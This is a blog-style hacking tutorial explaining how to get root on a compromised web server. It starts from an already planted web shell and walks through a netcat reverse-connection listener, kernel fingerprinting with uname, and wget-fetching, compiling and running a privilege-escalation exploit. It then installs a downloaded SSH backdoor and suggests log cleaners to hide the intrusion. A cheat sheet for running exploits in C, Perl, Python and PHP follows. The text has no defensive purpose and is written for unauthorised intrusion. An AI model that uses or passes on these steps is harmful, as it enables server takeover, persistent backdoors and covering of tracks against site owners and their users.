Learn Root

#So Lets Start…

These are Some Basic Questions asked by myself as a n00b.

# What is rooting ?

A. Getting access to the user => “root”, the main admin of the site.

# What is the need of rooting ?

A. Getting master admin privillages of Servers

Things you need

# A Shell on a Website

# An Exploit

# Log cleaner

# Ssh Backdoor

# Netcat

# A Brain

Simply you can search on Google¬†for these, except BRAIN and SHELL ūüėČ

Getting Back Connection to the servers

Open command prompt, and go to NetCat Path, Type

cd netcat.exe

OK. Open your Shell in your browser, go to the back connection tab, if it is not there get a shell like “WSO 2.3” or Any other

That’s your choice….

Specify your “ip & port as 2121”. Press connect, now you’ll get a shell to the server, you can give commands to the server through that shell.

Now came back to netcat and type

nc -l -v -p 2121

iIt will give you this output:

Code:

c:\netcat>nc -l -v -p 2121
listening on [any] 2121 ...

Getting a Right exploit for the servers

Type :

Uname -a

& hit enter.

It’ll look something like this:

Code:

[[email protected] /home/saijyoti/public_html/cgi-bin]$ uname -a
Linux dualxeon09.ns5.999servers.com 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010 x86_64 x86_64 x86_64 GNU/Linux

You have noted, It shows the kernel version of the server is: 2.6.18-194.26.1.el5
& Year is 2010.

You need to find a perfect exploit for it. you can find them at:-

$ Exploit-db.com

$ Packetstormsecurity.org

$ Th3-0utl4ws.com

$ Leetupload.com

Compiling & executing exploits

Now I’ve got a exploit, & it is written in C. So I can’t execute it by just uploading. but I need to compile it.

Before proceeding further, Cd into the tmp directory, because it is always writable. So type:

cd /home/XXXXX/public_html/tmp

// The path may be different, replace it with yours.

So first I’ll get the exploit on the server, So I type :

Wget http://exploitsite.net/2010-exploits/exploit.c

// Note: There is no such site, I’m just taking it to show you.

It’ll look something Like this:-

Code:

[email protected] /home/target_usernemr/public_html/tmp]$ wget http://exploitsite.net/2010-exploits/exploit.c
--2011-01-25 08:21:43-- http://exploitsite.net/2010-exploits/exploit.c
Resolving www.exploitsite.net... 199.58.192.192
Connecting to www.exploitsite.net|199.58.192.192|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15088 (15K) [text/x-csrc]
Saving to: `exploit.c'

Now change the permission of the exploit to 777.
Type:

chmod 777 exploit.c

Now the exploit is On my server, I just need to compile & execute it.

So, I’ll give the command:

gcc -o exploit exploit.c

It’ll compile & save the exploit as >> exploit

Next step is to execute it So we’ll type:

./exploit

Here it’ll show different process…
: #
: #

Got root you m0f0 !! [<example]

Now it say got root. Let’s Check is it true,
Type:

whoami

Then it will say

root

like: uid=0(root) gid=0(root) groups=0(root)

Type “su” to get full privilages !

Installing Backdoors

Type:

wget http://www.urlofbackdoor.com/sshdoor.zip

Then Type,

unzip sshdoor.zip

Then, =>

cd sshdoor

Then type,

./run pass port

^ : replace pass with your password, & a port.

Now connect with Putty & enjoy root privileges.

Methods to execute exploits written in other languages

C exploit
----------------------
gcc -o exploit exploit.c
chmod +x exploit
./exploit
----------------------
Perl Exploits
---------------
perl exploit.pl
---------------
Python
------------------
python exploit.py
------------------

php

-----------------
php exploit.php
-----------------

zip

----------------
unzip exploit.zip
./run
----------------

LEAVE A REPLY

Please enter your comment!
Please enter your name here